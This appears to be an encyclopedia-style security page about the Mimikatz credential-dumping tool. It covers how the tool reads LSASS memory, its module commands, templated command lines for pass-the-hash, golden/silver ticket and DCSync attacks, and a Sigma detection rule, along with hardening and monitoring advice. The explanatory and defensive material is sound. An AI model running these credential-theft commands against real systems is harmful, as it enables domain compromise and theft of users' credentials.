Cybersecurity
Mimikatz
Mimikatz is a penetration testing tool created by Benjamin Delpy, used for extracting passwords, hashes, and Kerberos tickets from Windows memory. It is widely used by both security professionals and cybercriminals.
What is Mimikatz?
Mimikatz Definition
Mimikatz is an open-source Windows security audit tool created in 2007 by French researcher Benjamin Delpy (known as “gentilkiwi”). The tool demonstrates weaknesses in Windows authentication mechanisms, enabling extraction of credentials from operating system memory.
History and Purpose
Genesis
2007 - Benjamin Delpy creates Mimikatz
↓
Goal: Demonstrate Windows Authentication weaknesses
↓
Microsoft initially ignores reports
↓
Tool becomes popular in pentesting
↓
2017 - Used in NotPetya and WannaCry attacksControversy
Mimikatz is a dual-use tool:
- Legal use - penetration testing, red teaming, research
- Illegal use - attacks, data theft, ransomware
How Does Mimikatz Work?
Mechanism
Mimikatz exploits the fact that Windows stores credentials in LSASS (Local Security Authority Subsystem Service) process memory:
LSASS (lsass.exe)
├── Plaintext passwords (older Windows versions)
├── NTLM hashes
├── Kerberos tickets
├── WDigest credentials
└── Encryption keysRequirements
- Administrator or SYSTEM privileges
- Access to LSASS process
- Windows with Credential Guard disabled (for full functionality)
Main Modules and Commands
sekurlsa - Credential Extraction
sekurlsa::logonpasswords
- Displays passwords, hashes, and tickets of all logged-in users
sekurlsa::wdigest
- Extracts WDigest credentials (plaintext in older Windows)
sekurlsa::kerberos
- Displays Kerberos tickets
sekurlsa::msv
- Shows NTLM hasheskerberos - Kerberos Attacks
kerberos::list
- List Kerberos tickets
kerberos::ptt ticket.kirbi
- Pass-the-Ticket attack
kerberos::golden
- Create Golden Ticket (domain-wide access)
kerberos::silver
- Create Silver Ticket (specific service access)lsadump - SAM/NTDS Dump
lsadump::sam
- Dump local SAM database (local accounts)
lsadump::dcsync
- Simulate Domain Controller, extract hashes from AD
lsadump::lsa
- Dump LSA secretsAttack Techniques
Pass-the-Hash (PtH)
1. Extract NTLM hash with Mimikatz
2. Use hash for authentication (without knowing password)
3. Access resources as victim
sekurlsa::pth /user:admin /domain:corp /ntlm:hashPass-the-Ticket (PtT)
1. Extract Kerberos ticket
2. Import ticket into own session
3. Access services as victim
kerberos::ptt ticket.kirbiGolden Ticket
1. Obtain KRBTGT account hash
2. Create forged TGT
3. Unlimited domain access for 10 years
kerberos::golden /user:Administrator /domain:corp.local
/sid:S-1-5-21-... /krbtgt:hashSilver Ticket
1. Obtain service account hash
2. Create forged TGS
3. Access to specific service
kerberos::golden /user:user /domain:corp.local
/sid:S-1-5-21-... /target:server
/service:cifs /rc4:hashDCSync
Domain Controller simulation:
1. Mimikatz impersonates DC
2. Requests password replication
3. Receives all hashes from AD
lsadump::dcsync /domain:corp.local /user:AdministratorDetecting Mimikatz
Indicators of Compromise (IoC)
Files:
- mimikatz.exe (various names)
- mimilib.dll
- mimidrv.sys
Processes:
- LSASS access by unknown processes
- Unauthorized sekurlsa usage
Logs:
- Event ID 4624 (logon) from suspicious sources
- Event ID 4672 (special privileges)
- Event ID 10 (Sysmon - LSASS access)
Detection Tools
| Tool | Capabilities |
|---|---|
| Windows Defender | Signature detection |
| Sysmon | LSASS access monitoring |
| EDR | Behavioral detection |
| YARA rules | Binary signatures |
| Sigma rules | Log detection |
Sigma Rule
title: Mimikatz Command Line Detection
status: stable
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains:
- 'sekurlsa'
- 'kerberos::ptt'
- 'lsadump::dcsync'
condition: selectionProtection Against Mimikatz
Credential Guard
# Enable Credential Guard (Windows 10/11 Enterprise)
# Requires: UEFI, Secure Boot, TPM 2.0
# Check status
Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuardLSA Protection
Windows Registry:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
RunAsPPL = 1
Protects LSASS process as Protected Process LightDisable WDigest
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
UseLogonCredential = 0
Prevents plaintext password storageGroup Policy Configuration
Computer Configuration > Administrative Templates > System > Credentials Delegation
├── Restrict delegation of credentials to remote servers
├── Remote host allows delegation of non-exportable credentials
└── Deny all delegationProtected Users Group
Add critical accounts to "Protected Users" group:
- No credential caching
- Kerberos enforced (no NTLM)
- Shorter TGT (4h instead of 10h)Best Practices
For Administrators
- Deploy Credential Guard - credential isolation
- Enable LSA Protection - LSASS protection
- Disable WDigest - no plaintext
- Limit privileges - least privilege
- Monitor LSASS - access and memory dumps
- Use Protected Users - for admins
- Regularly change KRBTGT password - 2x yearly
For SOC/Blue Team
- Event Log monitoring - 4624, 4672, 4648
- Sysmon Event ID 10 - LSASS access
- EDR/XDR - behavioral detection
- Threat Hunting - proactive searching
- Network monitoring - unusual AD replication
For Red Team
Mimikatz is an educational tool for:
- Penetration testing (with authorization)
- Red team exercises
- Security research
- Security verification
Mimikatz Alternatives
| Tool | Description |
|---|---|
| Rubeus | Kerberos attacks in C# |
| Impacket | Python, remote credential harvesting |
| SharpKatz | C# Mimikatz port |
| SafetyKatz | LSASS minidump, AV evasion |
| Pypykatz | Python implementation |
Mimikatz remains one of the most important tools in security professionals’ arsenal, demonstrating Windows architectural weaknesses and motivating Microsoft to continuously improve security.
Tags:
mimikatz credential dumping pentesting windows kerberos passwords